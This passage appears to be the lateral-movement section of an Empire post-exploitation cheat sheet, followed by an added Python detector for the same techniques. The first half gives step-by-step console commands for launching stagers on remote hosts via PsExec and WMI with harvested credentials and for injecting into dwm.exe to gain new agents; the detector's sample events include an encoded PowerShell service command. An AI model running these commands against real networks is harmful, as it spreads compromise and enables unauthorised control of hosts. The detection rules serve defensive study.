3. LATERAL MOVEMENT
Execute a stager on remote hosts using PsExec
(empire: agentname) > creds
(empire: agentname) > usemodule lateral_movement/invoke_psexec
(empire: agentname) > info
(empire: agentname) > set Listener [listenername]
(empire: agentname) > set ComputerName [ipoftgt] (IP address of target)
(empire: agentname) > execute
[If successful, this creates another agent.]

Execute a stager on remote hosts using WMI
(empire: agentname) > creds
(empire: agentname) > usemodule lateral_movement/invoke_wmi
(empire: agentname) > info
(empire: agentname) > set CredID [number] (CredID from creds)
(empire: agentname) > set Listener [listenername]
(empire: agentname) > set ComputerName [ipoftgt] (IP address of target)
(empire: agentname) > execute
[If successful, this creates another agent.]

Injecting into the DWM process
(empire: agentname) > ps dwm
------------------------------------------------
ProcessName  PID  Arch  Username  Mem Using
dwm          612  x86   xxxx      xxx
------------------------------------------------
(empire: agentname) > psinject [listenername] [PID]
(empire: agentname) > execute
[If successful, this creates another agent.]
(empire: agentname) > back
(empire: agents) > list
(empire: agents) > interact [nameofagent]
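
Detection view of the three techniques above, as an added example that is not part of the original cheat sheet: it flags a service install whose binary path is a shell command (PsExec-style execution), a command interpreter started by the WMI provider host, and a thread created inside dwm.exe by another process. The sample events, host names and function names are constructed for illustration; field names follow System log event 7045 and Sysmon events 1 and 8, and it is an assumption that Sysmon is deployed and that the injection shows up as event 8.

```python
import re

# Matches a command interpreter named in a service path or process image.
SHELL = re.compile(r"\b(powershell|pwsh|cmd)(\.exe)?\b|%comspec%", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return a finding label for one event dict, or None if nothing matches."""
    key = (ev.get("log"), ev.get("id"))
    # System 7045: a new service whose binary path is a shell command.
    if key == ("System", 7045) and SHELL.search(ev.get("ImagePath", "")):
        return "service-runs-shell"
    # Sysmon 1: the WMI provider host starting a command interpreter.
    if key == ("Sysmon", 1) and basename(ev.get("ParentImage", "")) == "wmiprvse.exe" \
            and SHELL.search(basename(ev.get("Image", ""))):
        return "wmi-spawned-shell"
    # Sysmon 8: any process creating a thread inside dwm.exe.
    if key == ("Sysmon", 8) and basename(ev.get("TargetImage", "")) == "dwm.exe":
        return "remote-thread-into-dwm"
    return None

def findings(events):
    """List (host, label) for every event that matched a rule."""
    return [(ev["host"], label) for ev in events if (label := classify(ev))]

# Constructed sample events (hosts, paths and service names are made up).
SAMPLE = [
    {"log": "System", "id": 7045, "host": "WS01", "ServiceName": "example-svc",
     "ImagePath": r"%COMSPEC% /C powershell -NoP -Enc <base64>"},
    {"log": "System", "id": 7045, "host": "WS02", "ServiceName": "VendorAgent",
     "ImagePath": r'"C:\Program Files\Vendor\agent.exe" --service'},
    {"log": "Sysmon", "id": 1, "host": "WS03",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"log": "Sysmon", "id": 1, "host": "WS03",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"log": "Sysmon", "id": 8, "host": "WS04",
     "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetImage": r"C:\Windows\System32\dwm.exe"},
]

if __name__ == "__main__":
    for host, label in findings(SAMPLE):
        print(host, label)
```

The interactive PowerShell started from explorer.exe and the vendor service install are left unflagged, which shows why the rules key on the parent process and the service binary path instead of on PowerShell alone.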